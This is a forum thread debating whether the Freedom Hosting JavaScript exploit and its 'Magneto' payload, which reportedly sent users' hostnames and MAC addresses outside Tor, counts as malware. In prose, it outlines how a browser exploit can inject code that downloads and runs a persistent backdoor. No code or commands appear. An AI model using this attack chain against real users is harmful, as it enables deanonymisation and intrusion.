Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???

The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
If malware is defined as any computer instruction code designed for a malicious purpose then sure, you can call that malware.  It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction though.

In regards to the assembly code you quote.  Where was this encoded in the script?  Magneto?

It is entirely possible for server-side javascript to cause a compiled piece of software to be executed on a remote machine, via a browser exploit. This assembly code could have very well been used to download a secondary payload from a FBI server, the secondary payload could have been a program written in C, and after it downloaded it then it could have executed it and infected the system with a persistent backdoor. That is very common for hackers to do, javascript exploit to inject assembly code into the target computers memory and execute it, assembly code downloads secondary payload from the internet and executes it. The FBI didn't do that because they didn't need to and might have been restricted by the court from doing so, and instead they just used an assembly program that gathers mac address and hostname and sends it to a server outside of Tor.

It's important to remember that a javascript exploit would be needed for code execution in either case.
Quote
Yeah it was encoded in Magneto. I would call it malware because it compromised user security. I don't know what your definition of malware is, but if it requires a persistent infection then it could have been delivered by this attack as well, magneto would have just downloaded a secondary more complex compiled program and executed it.

The wikipedia definition of malware supports your definition.
Quote
Malware, short for malicious software, is software used or programmed by attackers to disrupt computer operation, gather sensitive information, or gain access to private computer systems[1] . It can appear in the form of code, scripts, active content, and other software.[2] 'Malware' is a general term used to refer to a variety of forms of hostile or intrusive software.[3]

Quote
Just as a side discussion, I think it is kind of shocking how many javascript developers I meet who think that javascript can absolutely not be used to infect computers, that it is totally safe, cannot cause malware infections, etc. It is a really common belief apparently, and it is weird considering that an enormous number of the attacks against browsers are javascript based.
Very true.  Javascript itself is the biggest security threat when using a web browser.  All users should be blocking scripts, not just in TBB but in your normal web-browser as well.